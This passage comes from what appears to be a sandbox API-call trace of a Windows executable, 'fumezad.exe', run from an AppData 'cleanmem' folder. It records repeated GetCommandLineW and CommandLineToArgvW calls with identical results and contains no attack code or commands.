returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.533] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c8138*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.533] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.533] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c81b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.533] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.533] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c8238*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.533] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.533] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c82b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.533] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.533] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c8338*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.533] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.533] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c83b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.533] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.533] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c8438*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.533] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.533] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c84b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.533] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.533] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c8538*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.533] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.534] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c85b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.534] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.534] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c8638*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.534] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.534] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c86b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.534] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.534] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c8738*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.534] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.534] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c87b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.534] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.534] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c8838*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.534] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.534] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c88b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.534] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.534] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c8938*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.534] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.534] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c89b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.534] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.534] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c8ab8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.534] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.534] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c8b38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.534] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.534] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c8bb8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.534] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.534] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c8c38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.534] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.534] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c8cb8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.534] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.534] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c8d38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.535] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.535] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c8db8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.535] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.535] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c8e38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.535] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.535] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c8eb8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.535] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.535] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c8f38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.535] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.535] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c8fb8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.535] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.535] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c9038*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.535] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.535] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c90b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.535] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.535] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c9138*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.535] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.535] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c91b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.535] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.535] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c9238*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.535] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.535] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c92b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.535] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.535] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c9338*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.535] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.535] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c93b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.535] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.535] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c9438*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.535] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.535] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c94b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.535] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.535] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c9538*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.535] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.535] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c95b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.536] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.536] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c9638*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.536] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.536] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c96b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.536] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.536] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c9738*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.536] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.536] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c97b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.536] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.536] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c9838*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.536] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.536] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c98b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.536] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.536] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c9938*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.536] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.536] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c99b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.536] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.536] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c9a38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.536] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.536] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c9ab8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.536] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.536] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c9b38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.536] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.536] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c9bb8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.536] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.536] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c9c38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.536] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.536] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c9cb8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.536] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.536] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c9d38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.536] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.536] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c9db8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.536] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.536] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c9e38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.536] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.536] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c9eb8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.537] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.537] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c9f38*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.537] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.537] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c9fb8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.537] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.537] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2ca038*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.537] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.537] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2ca0b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.537] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.537] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2ca138*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.537] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.537] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2ca1b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.537] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.537] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2ca238*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.537] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.537] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2ca2b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.537] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.537] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2ca338*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.537] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.537] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2ca3b8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.537] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.537] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 